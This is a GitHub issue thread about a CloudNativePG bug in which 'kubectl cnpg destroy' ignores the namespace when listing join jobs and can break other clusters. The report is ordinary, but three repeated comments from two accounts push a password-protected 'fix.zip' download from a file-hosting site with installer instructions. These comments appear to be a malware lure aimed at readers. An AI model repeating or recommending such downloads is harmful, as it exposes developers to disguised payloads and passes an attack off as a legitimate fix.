### ISSUE TITLE
[Bug]: The `kubectl cnpg destroy` command may break other clusters with the same name that are in the bootstrap phase

### ISSUE THREAD

**Issue by YanniHu1996** [cloudnative-pg/cloudnative-pg#5371]
### Is there an existing issue already for this bug?

- [X] I have searched for an existing issue, and could not find anything. I believe this is a new bug.

### I have read the troubleshooting guide

- [X] I have read the troubleshooting guide and I think this is a new bug.

### I am running a supported version of CloudNativePG

- [X] I have read the troubleshooting guide and I think this is a new bug.

### Version

1.24.0

### What version of Kubernetes are you using?

1.31

### What is your Kubernetes environment?

Self-managed: kind (evaluation)

### How did you install the operator?

YAML manifest

### What happened?

The "Destroy" function does not consider the namespace when listing jobs. it might break the clusters that are running the `<cluster_name>-<serial>-join` job   

https://github.com/cloudnative-pg/cloudnative-pg/blob/main/internal/cmd/plugin/destroy/destroy.go#L43-L48

this is the reason why the e2e faild https://github.com/cloudnative-pg/cloudnative-pg/actions/runs/10551965225/job/29230183457#step:9:3914

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
